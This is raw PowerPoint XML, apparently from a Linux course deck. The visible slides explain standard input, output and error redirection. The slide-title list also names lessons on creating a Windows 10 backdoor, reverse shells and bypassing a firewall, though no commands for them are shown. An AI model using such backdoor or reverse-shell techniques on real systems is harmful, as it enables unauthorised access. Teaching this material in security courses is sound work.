          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="5" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2678006" y="2324375"/>
            <a:ext cx="3856556" cy="466272"/>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3364261" y="2175094"/>
            <a:ext cx="1428596" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0&lt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2973444" y="3175183"/>
            <a:ext cx="3683915" cy="543815"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Elbow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4187163" y="1496590"/>
            <a:ext cx="247787" cy="4692605"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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59699" y="2921442"/>
            <a:ext cx="1691489" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1&gt;     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3236534" y="4104458"/>
            <a:ext cx="2060179" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>err output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="969276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Standard output: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631527" y="2333144"/>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echo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2648909" y="2876960"/>
            <a:ext cx="2736623" cy="324536"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3335163" y="2623220"/>
            <a:ext cx="1691489" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1&gt;     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5455421" y="2055336"/>
            <a:ext cx="5982535" cy="2730881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2089025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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="568379" y="2027765"/>
            <a:ext cx="5759451" cy="3778287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6533576" y="1721271"/>
            <a:ext cx="5658424" cy="4084780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1435293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Standard input: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stdin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956063" y="2631367"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="5" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2678006" y="2324375"/>
            <a:ext cx="3856556" cy="466272"/>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3364261" y="2175094"/>
            <a:ext cx="1428596" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0&lt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6633725" y="1345083"/>
            <a:ext cx="4801271" cy="2070389"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="852426" y="4395675"/>
            <a:ext cx="10860345" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Display the content of a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>tell cat to take input from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myfile.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Send the myflle.txt content to input device,  tell cat to take input from the device, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Same as 2 (0 is a default input device)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6048732" y="5818693"/>
            <a:ext cx="3251200" cy="469900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3015196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Standard error: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stderr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956063" y="2631367"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2973444" y="3010331"/>
            <a:ext cx="2798021" cy="251808"/>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3364262" y="2175094"/>
            <a:ext cx="1138453" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>err</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4238118" y="4601455"/>
            <a:ext cx="8102987" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Save error message to a file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>error.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> as system can’t find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>foo.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5771466" y="2215782"/>
            <a:ext cx="5880921" cy="1613125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7087148" y="2920818"/>
            <a:ext cx="701699" cy="168063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674251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Networking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="6470651"/>
            <a:ext cx="732367" cy="387349"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2518429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Chatting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1127425" y="1443234"/>
            <a:ext cx="8795217" cy="5087548"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2416641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2836</TotalTime>
  <Words>766</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>124</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 Unicode MS</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Advanced Linux Commands</vt:lpstr>
      <vt:lpstr>Standard input/output/error</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Standard output: stdout</vt:lpstr>
      <vt:lpstr>Another example</vt:lpstr>
      <vt:lpstr>Standard input: stdin</vt:lpstr>
      <vt:lpstr>Standard error: stderr</vt:lpstr>
      <vt:lpstr>Networking</vt:lpstr>
      <vt:lpstr>Chatting</vt:lpstr>
      <vt:lpstr>Data Transfer</vt:lpstr>
      <vt:lpstr>Your work</vt:lpstr>
      <vt:lpstr>Goal : Communication between two machines</vt:lpstr>
      <vt:lpstr>Goal</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Create a backdoor at Window 10</vt:lpstr>
      <vt:lpstr>Backdoor background</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>Motivation</vt:lpstr>
      <vt:lpstr>How to bypass firewall?</vt:lpstr>
      <vt:lpstr>Reverse shell definition</vt:lpstr>
      <vt:lpstr>Reverse shell demo</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Extra credits: Another approach for reverse shell</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Summary</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Xu</dc:creator>
  <cp:lastModifiedBy>Weifeng Xu</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-14T14:43:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-01T14:18:38Z</dcterms:modified>
</cp:coreProperties>
</file>